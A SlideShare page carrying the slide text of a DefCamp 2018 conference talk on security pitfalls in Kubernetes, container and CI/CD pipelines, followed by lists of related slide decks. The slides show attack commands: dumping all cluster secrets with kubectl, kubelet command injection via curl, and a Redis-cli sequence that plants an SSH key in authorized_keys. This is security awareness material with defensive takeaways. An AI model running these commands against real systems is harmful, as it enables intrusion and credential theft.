SlideShare a Scribd company logo

Security pitfalls in script-able infrastructure pipelines.

DefCamp
DefCamp

Jesper Larsson in Bucharest, Romania on November 8-9th 2018 at DefCamp #9. The videos and other presentations can be found on https://def.camp/archive

Technology
1 of 36
Download to read offline
$ Whoami Jesper Larsson jesper@assured.se - jesper@cure53.de @herrJesper https://www.linkedin.com/in/gustafjesperlarsson I work as a Security Consultant for Assured and Cure53. (it´s complicated) I do security research on embedded systems and infrastructure as well as penetration testing, security reviews, architectural assessments. “Professional provider of opinions” Those are my principles and if you don’t like them… Well I have more… www.assured.se | www.cure53.de
Security pitfalls in script-able infrastructure DefCamp - 2018
$ Outline for this talk
01. Containers, Orchestrations & Pipelines ”How is this even a talk about security, hold my beer!”.
$ Virtual Machines vs Containers Host Operating system Infrastructure Hypervisor Host Operating system Infrastructure Container Engine Guest OS Guest OS Guest OS Bins/Libs Bins/libs Bins/libs App1 App2 App3 Bins/Libs Bins/libs Bins/libs App1 App2 App3
$ Containers, Pods, Chroots, and what not
$ Continuous Everything!
$ The Playing field - Orchestrations, Pipelines Secrets Store DevOps Peeps REPO INFRA AS CODE CI / CD Container Orchestration Monitoring Pipeline = Production Environment Commit </>
$ Containers, Orchestrations & Pipelines
02. Any security challenges?”How does this even work! Insert a clever quote here “<img src = ”.
$ Attack Surface?
$ One compromise to rule them all Secrets Store DevOps Peeps REPO INFRA AS CODE CI / CD Container Orchestration Monitoring Pipeline = Production Environment Commit </>
$ Attack Surface Managing Secrets Vulnerability management Configuration management Firewalling, ACL, ingress/egress, Network and service segmentation Privilege management, Role based access controls Unprotected endpoints, APIs, Services Repository management Patch management Vulnerable sources Onboarding and offboarding activities Continuous monitoring and auditing Default Credentials Security Settings Know Vulnerabilities Faulty Verifications
03. Fails, Fails, Fails…”Finally time some destruction, chaos and suffering”.
UI CLI API Kubernetes Master API Server Scheduler Controller etcd $ Kubernetes infrastructure Image Registry Node 1 Node 2 Node 3 Node 4 Node 1, 2, 3, 4 Docker kubelet kube proxy Flannel Pod Pod Pod Pod Pod Pod Pod Pod Pod Other services Network,DNS,MX,UI Users
$ Security Concerns out of the box? A few... API Authentication API Authorization TLS for API traffic Role Base Authentication Cloud metadata API Access Access to kubectl Access to etcd Network ACL Ingress and Egress Encrypt Secrets at rest ACL to Kubelets Container privileges Pod Security policies Controlling capabilities in user runtime and of specific workloads Rotation for infrastructure credentials Restrict access to alpha and beta features Image verification Defense in depth Pod and node separation Monitoring
$ How bad was is if a etcd instance was breached?
$ etcd instances on the interwebz today
$ looking at the etcd service of kubernetes J J J J Lets have a look at the kcf.tar The most epic function! ?recursive=true
$ Kubernetes etcd vs internet?
$ Kubernetes etcd vs internet?
$ Pivoting from pod to cluster administrator curl -sLO "https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl && chmod +x kubectl && mv kubectl /usr/local/bin" kubectl get secrets –all-namespaces –o yaml apiVersion: v1 items: - apiVersion: v1 data: site.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0t…
$ Kubelet command injection curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /" curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=env"
$ kubectl command injection
$ Soo… No one would ever expose their Redis instance?
$ Using Redis-Cli to gain a SSH-session
$ Using Redis-Cli to gain a SSH-session (echo -e "nn"; cat id_rsa.pub; echo -e "nn") > key.txt “ AAAAB3NzaC1yc2EAAAADAQABAAABAQDMw97+kkv6cNlsPZDxQ/Dkxp7b7bfyj/SyvwyMmhEPe3u6TTcxh AINyKM+FrOVMfCYxI95RecR8RtoUdHf8CcmaCJ7k8VMCSbyRe7bljpQx4T[...] “
$ Using Redis-Cli to gain a SSH-session cat key.txt | redis-cli –h 172.16.10.132 –x set woop OK redis-cli –h 172.16.10.132 172.16.10.132:6379> config set dir /Users/jeslar/.ssh/ OK 172.16.10.132:6379> config get dir 1) “dir” 2) ”/Users/jeslar/.ssh” 172.16.10.132:6379> config set dbfilename “authorized_keys” OK 172.16.10.132:6379> save OK
$ Using Redis-Cli to gain a SSH-session
• Ensure that that critical security features are enabled and configured correctly • Use authentication and authorization for all API access. Especially management API • Adopt the security model of least privileged • Mange secrets • Separate cluster for dev/test and production • Account management, VPCs, Repos • Zero-trust networking • Access controls • Security audits $ Takeaways
Thanks for listening @herrJesper Follow me on twitter!
Shameless plug time! www.securityfest.com May 23rd-24th 2019 Gothenburg, Sweden

Recommended

Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupBharvi Dixit
 
Jenkins X on AKS
Jenkins X on AKSJenkins X on AKS
Jenkins X on AKSRyo Fujita
 
Moby and kubernetes entitlements
Moby and kubernetes entitlementsMoby and kubernetes entitlements
Moby and kubernetes entitlementsMoby Project
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
Zookeeper In Action
Zookeeper In ActionZookeeper In Action
Zookeeper In Actionjuvenxu
 
10 Useful Asciidoctor Tips
10 Useful Asciidoctor Tips10 Useful Asciidoctor Tips
10 Useful Asciidoctor TipsAndres Almiray
 
ぼくとCassandraの6にちせんそう
ぼくとCassandraの6にちせんそうぼくとCassandraの6にちせんそう
ぼくとCassandraの6にちせんそうYoshinori Sato
 
Asciidoctor, because documentation does not have to suck
Asciidoctor, because documentation does not have to suckAsciidoctor, because documentation does not have to suck
Asciidoctor, because documentation does not have to suckAndres Almiray
 

Recommended

Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupBharvi Dixit
 
Jenkins X on AKS
Jenkins X on AKSJenkins X on AKS
Jenkins X on AKSRyo Fujita
 
Moby and kubernetes entitlements
Moby and kubernetes entitlementsMoby and kubernetes entitlements
Moby and kubernetes entitlementsMoby Project
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
Zookeeper In Action
Zookeeper In ActionZookeeper In Action
Zookeeper In Actionjuvenxu
 
10 Useful Asciidoctor Tips
10 Useful Asciidoctor Tips10 Useful Asciidoctor Tips
10 Useful Asciidoctor TipsAndres Almiray
 
ぼくとCassandraの6にちせんそう
ぼくとCassandraの6にちせんそうぼくとCassandraの6にちせんそう
ぼくとCassandraの6にちせんそうYoshinori Sato
 
Asciidoctor, because documentation does not have to suck
Asciidoctor, because documentation does not have to suckAsciidoctor, because documentation does not have to suck
Asciidoctor, because documentation does not have to suckAndres Almiray
 
zookeeperProgrammers
zookeeperProgrammerszookeeperProgrammers
zookeeperProgrammersHiroshi Ono
 
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스 AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스 Amazon Web Services Korea
 
Computing-Session Mobility
Computing-Session MobilityComputing-Session Mobility
Computing-Session MobilityKevin Regan
 
Zookeeper Introduce
Zookeeper IntroduceZookeeper Introduce
Zookeeper Introducejhao niu
 
Writing documentation with Asciidoctor
Writing documentation with AsciidoctorWriting documentation with Asciidoctor
Writing documentation with AsciidoctorJérémie Bresson
 
GuiceCon 2011 - Sisu
GuiceCon 2011 - SisuGuiceCon 2011 - Sisu
GuiceCon 2011 - SisuStuart McCulloch
 
The Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriThe Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriDocker, Inc.
 
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Lacework
 
Containers for Science and High-Performance Computing
Containers for Science and High-Performance ComputingContainers for Science and High-Performance Computing
Containers for Science and High-Performance ComputingDmitry Spodarets
 
Real Security in a Virtual Environment
Real Security in a Virtual EnvironmentReal Security in a Virtual Environment
Real Security in a Virtual EnvironmentMattias Geniar
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityJérôme Petazzoni
 
Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Jérôme Petazzoni
 
PuppetDB: Sneaking Clojure into Operations
PuppetDB: Sneaking Clojure into OperationsPuppetDB: Sneaking Clojure into Operations
PuppetDB: Sneaking Clojure into Operationsgrim_radical
 
Microservices and Friends
Microservices and FriendsMicroservices and Friends
Microservices and FriendsYun Zhi Lin
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos EngineeringSIGHUP
 
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...Lacework
 
Systems Bioinformatics Workshop Keynote
Systems Bioinformatics Workshop KeynoteSystems Bioinformatics Workshop Keynote
Systems Bioinformatics Workshop KeynoteDeepak Singh
 
Our Puppet Story (GUUG FFG 2015)
Our Puppet Story (GUUG FFG 2015)Our Puppet Story (GUUG FFG 2015)
Our Puppet Story (GUUG FFG 2015)DECK36
 
Docker and kernel security
Docker and kernel securityDocker and kernel security
Docker and kernel securitysmart_bit
 
Infrastructure-as-code: bridging the gap between Devs and Ops
Infrastructure-as-code: bridging the gap between Devs and OpsInfrastructure-as-code: bridging the gap between Devs and Ops
Infrastructure-as-code: bridging the gap between Devs and OpsMykyta Protsenko
 
Weave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 RecapWeave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 RecapPatrick Chanezon
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
 

More Related Content

What's hot

zookeeperProgrammers
zookeeperProgrammerszookeeperProgrammers
zookeeperProgrammersHiroshi Ono
 
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스 AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스 Amazon Web Services Korea
 
Computing-Session Mobility
Computing-Session MobilityComputing-Session Mobility
Computing-Session MobilityKevin Regan
 
Zookeeper Introduce
Zookeeper IntroduceZookeeper Introduce
Zookeeper Introducejhao niu
 
Writing documentation with Asciidoctor
Writing documentation with AsciidoctorWriting documentation with Asciidoctor
Writing documentation with AsciidoctorJérémie Bresson
 

What's hot (6)

zookeeperProgrammers
zookeeperProgrammerszookeeperProgrammers
zookeeperProgrammers
 
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스 AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스
AWS 9월 웨비나 | AWS Lambda@Edge를 통한 엣지 컴퓨팅 서비스
 
Computing-Session Mobility
Computing-Session MobilityComputing-Session Mobility
Computing-Session Mobility
 
Zookeeper Introduce
Zookeeper IntroduceZookeeper Introduce
Zookeeper Introduce
 
Writing documentation with Asciidoctor
Writing documentation with AsciidoctorWriting documentation with Asciidoctor
Writing documentation with Asciidoctor
 
GuiceCon 2011 - Sisu
GuiceCon 2011 - SisuGuiceCon 2011 - Sisu
GuiceCon 2011 - Sisu
 

Similar to Security pitfalls in script-able infrastructure pipelines.

The Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriThe Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriDocker, Inc.
 
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Lacework
 
Containers for Science and High-Performance Computing
Containers for Science and High-Performance ComputingContainers for Science and High-Performance Computing
Containers for Science and High-Performance ComputingDmitry Spodarets
 
Real Security in a Virtual Environment
Real Security in a Virtual EnvironmentReal Security in a Virtual Environment
Real Security in a Virtual EnvironmentMattias Geniar
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityJérôme Petazzoni
 
Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Jérôme Petazzoni
 
PuppetDB: Sneaking Clojure into Operations
PuppetDB: Sneaking Clojure into OperationsPuppetDB: Sneaking Clojure into Operations
PuppetDB: Sneaking Clojure into Operationsgrim_radical
 
Microservices and Friends
Microservices and FriendsMicroservices and Friends
Microservices and FriendsYun Zhi Lin
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos EngineeringSIGHUP
 
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...Lacework
 
Systems Bioinformatics Workshop Keynote
Systems Bioinformatics Workshop KeynoteSystems Bioinformatics Workshop Keynote
Systems Bioinformatics Workshop KeynoteDeepak Singh
 
Our Puppet Story (GUUG FFG 2015)
Our Puppet Story (GUUG FFG 2015)Our Puppet Story (GUUG FFG 2015)
Our Puppet Story (GUUG FFG 2015)DECK36
 
Docker and kernel security
Docker and kernel securityDocker and kernel security
Docker and kernel securitysmart_bit
 
Infrastructure-as-code: bridging the gap between Devs and Ops
Infrastructure-as-code: bridging the gap between Devs and OpsInfrastructure-as-code: bridging the gap between Devs and Ops
Infrastructure-as-code: bridging the gap between Devs and OpsMykyta Protsenko
 
Weave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 RecapWeave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 RecapPatrick Chanezon
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
 
Shmoocon 2013 - OpenStack Security Brief
Shmoocon 2013 - OpenStack Security BriefShmoocon 2013 - OpenStack Security Brief
Shmoocon 2013 - OpenStack Security Briefopenfly
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Sysdig
 
The Container Security Checklist
The Container Security Checklist The Container Security Checklist
The Container Security Checklist LibbySchulze
 
Puppet at Bazaarvoice
Puppet at BazaarvoicePuppet at Bazaarvoice
Puppet at BazaarvoicePuppet
 

Similar to Security pitfalls in script-able infrastructure pipelines. (20)

The Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriThe Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
 
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
 
Containers for Science and High-Performance Computing
Containers for Science and High-Performance ComputingContainers for Science and High-Performance Computing
Containers for Science and High-Performance Computing
 
Real Security in a Virtual Environment
Real Security in a Virtual EnvironmentReal Security in a Virtual Environment
Real Security in a Virtual Environment
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and security
 
Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?
 
PuppetDB: Sneaking Clojure into Operations
PuppetDB: Sneaking Clojure into OperationsPuppetDB: Sneaking Clojure into Operations
PuppetDB: Sneaking Clojure into Operations
 
Microservices and Friends
Microservices and FriendsMicroservices and Friends
Microservices and Friends
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos Engineering
 
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...
DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryp...
 
Systems Bioinformatics Workshop Keynote
Systems Bioinformatics Workshop KeynoteSystems Bioinformatics Workshop Keynote
Systems Bioinformatics Workshop Keynote
 
Our Puppet Story (GUUG FFG 2015)
Our Puppet Story (GUUG FFG 2015)Our Puppet Story (GUUG FFG 2015)
Our Puppet Story (GUUG FFG 2015)
 
Docker and kernel security
Docker and kernel securityDocker and kernel security
Docker and kernel security
 
Infrastructure-as-code: bridging the gap between Devs and Ops
Infrastructure-as-code: bridging the gap between Devs and OpsInfrastructure-as-code: bridging the gap between Devs and Ops
Infrastructure-as-code: bridging the gap between Devs and Ops
 
Weave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 RecapWeave User Group Talk - DockerCon 2017 Recap
Weave User Group Talk - DockerCon 2017 Recap
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
 
Shmoocon 2013 - OpenStack Security Brief
Shmoocon 2013 - OpenStack Security BriefShmoocon 2013 - OpenStack Security Brief
Shmoocon 2013 - OpenStack Security Brief
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
 
The Container Security Checklist
The Container Security Checklist The Container Security Checklist
The Container Security Checklist
 
Puppet at Bazaarvoice
Puppet at BazaarvoicePuppet at Bazaarvoice
Puppet at Bazaarvoice
 

More from DefCamp

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht HackingDefCamp
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!DefCamp
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of TrustDefCamp
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?DefCamp
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXDefCamp
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...DefCamp
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDefCamp
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)DefCamp
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFADefCamp
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationDefCamp
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money downDefCamp
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...DefCamp
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochDefCamp
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareDefCamp
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?DefCamp
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured DefCamp
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...DefCamp
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.DefCamp
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber SecurityDefCamp
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering holeDefCamp
 

More from DefCamp (20)

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht Hacking
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of Trust
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UX
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money down
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epoch
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber Security
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering hole
 

Recently uploaded

Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Friends Colony Women Seeking Men
